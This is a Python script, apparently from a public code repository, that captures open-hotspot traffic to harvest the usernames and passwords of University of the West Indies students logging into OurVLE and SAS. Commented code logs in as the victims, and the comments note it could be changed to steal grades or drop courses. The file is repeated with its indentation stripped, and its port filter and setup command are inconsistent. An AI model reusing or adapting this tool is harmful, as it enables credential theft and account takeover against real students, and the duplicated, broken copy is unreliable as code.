JonCooperWorks/password_harvester.py

## password_harvester.py
#!/usr/bin/env python

'''
UWI data harvester. Created by Jonathan Cooper.
Based loosly on idiocy.py by Jonty (https://github.com/Jonty/)
Dumps UWI student information sent over an open hotspot by scanning
traffic to OurVLE. This also works with SAS by scanning port 9010
instead of 80 and checking for POST requests to /pls/data_mona/twbkwbis.P_ValLogin
with host sas.uwimona.edu.jm:9010.
To run, just type
sudo ifconfig iwconfig mon0 mode monitor && mon0 up && python password_harvester.py -i mon0
into a shell.
'''
import os
import getopt
import sys
import pcap
import dpkt
import re
import ourvle
import sas

def usage():
    print >>sys.stderr, 'Usage: %s [-i device]' % sys.argv[0]
    sys.exit(1)

def main():
    opts, args = getopt.getopt(sys.argv[1:], 'i:h')
    device = None
    for o, a in opts:
        if o == '-i':
            device = a
        else:
            usage()

    cap = pcap.pcap(device)
    cap.setfilter('dst port 8080')

    processed = {}

    print 'Scanning . . .'
    #Scan all traffic on port 80
    for ts, raw in cap:
        eth = dpkt.ethernet.Ethernet(raw)
        # Depending on platform, we can either get fully formed packets or unclassified radio data
        if isinstance(eth.data, str):
            data = eth.data
        else:
            data = eth.data.data.data

        #Dump any HTTP requests going to OurVLE
        if 'Host: ourvle.mona.uwi.edu' in data:
            print data

        #Detect if a user is logging in to OurVLE
        if 'Host: ourvle.mona.uwi.edu' in data and ('POST /login/index.php' in data or 'POST http://ourvle.mona.uwi.edu/login/index.php' in data):
            #Look for username:password combo in file
            cred_pattern = re.search('username=(\d{9})&password=(.*)$', data)
            credentials = {
            'username' : cred_pattern.group(1),
            'password' : cred_pattern.group(2),
            }
            #Print it to screen
            print credentials

            '''
            To log into OurVLE as the student, and get their name and courses, uncomment
            the code below. Not recommended to do so in this loop, since it will slow down the
            harvesting. Instead, generate a list of names and run this code against it after
            you have harvested enough username/password combinations.
            '''
            #browser = ourvle.Browser()
            #print browser.login(credentials['username'], credentials['password'])
            '''
            The below commented lines of code allow for SAS access. Currently, it only downloads
            a timetable because jail isn't fun. The above performance concern applies here too,
            so do them both as post-processing of the harvested data. This could, however, be
            modified to steal their grades or drop their courses.
            '''
            #browser = sas.SASBrowser()
            #print browser.timetable(credentials['username'], credentials['password'])

        else:
            continue

if __name__ == '__main__':
    main()
	#!/usr/bin/env python

	'''
	UWI data harvester. Created by Jonathan Cooper.
	Based loosly on idiocy.py by Jonty (https://github.com/Jonty/)
	Dumps UWI student information sent over an open hotspot by scanning
	traffic to OurVLE. This also works with SAS by scanning port 9010
	instead of 80 and checking for POST requests to /pls/data_mona/twbkwbis.P_ValLogin
	with host sas.uwimona.edu.jm:9010.
	To run, just type
	sudo ifconfig iwconfig mon0 mode monitor && mon0 up && python password_harvester.py -i mon0
	into a shell.
	'''
	import os
	import getopt
	import sys
	import pcap
	import dpkt
	import re
	import ourvle
	import sas

	def usage():
	print >>sys.stderr, 'Usage: %s [-i device]' % sys.argv[0]
	sys.exit(1)

	def main():
	opts, args = getopt.getopt(sys.argv[1:], 'i:h')
	device = None
	for o, a in opts:
	if o == '-i':
	device = a
	else:
	usage()

	cap = pcap.pcap(device)
	cap.setfilter('dst port 8080')

	processed = {}

	print 'Scanning . . .'
	#Scan all traffic on port 80
	for ts, raw in cap:
	eth = dpkt.ethernet.Ethernet(raw)
	# Depending on platform, we can either get fully formed packets or unclassified radio data
	if isinstance(eth.data, str):
	data = eth.data
	else:
	data = eth.data.data.data

	#Dump any HTTP requests going to OurVLE
	if 'Host: ourvle.mona.uwi.edu' in data:
	print data

	#Detect if a user is logging in to OurVLE
	if 'Host: ourvle.mona.uwi.edu' in data and ('POST /login/index.php' in data or 'POST http://ourvle.mona.uwi.edu/login/index.php' in data):
	#Look for username:password combo in file
	cred_pattern = re.search('username=(\d{9})&password=(.*)$', data)
	credentials = {
	'username' : cred_pattern.group(1),
	'password' : cred_pattern.group(2),
	}
	#Print it to screen
	print credentials

	'''
	To log into OurVLE as the student, and get their name and courses, uncomment
	the code below. Not recommended to do so in this loop, since it will slow down the
	harvesting. Instead, generate a list of names and run this code against it after
	you have harvested enough username/password combinations.
	'''
	#browser = ourvle.Browser()
	#print browser.login(credentials['username'], credentials['password'])
	'''
	The below commented lines of code allow for SAS access. Currently, it only downloads
	a timetable because jail isn't fun. The above performance concern applies here too,
	so do them both as post-processing of the harvested data. This could, however, be
	modified to steal their grades or drop their courses.
	'''
	#browser = sas.SASBrowser()
	#print browser.timetable(credentials['username'], credentials['password'])

	else:
	continue

	if __name__ == '__main__':
	main()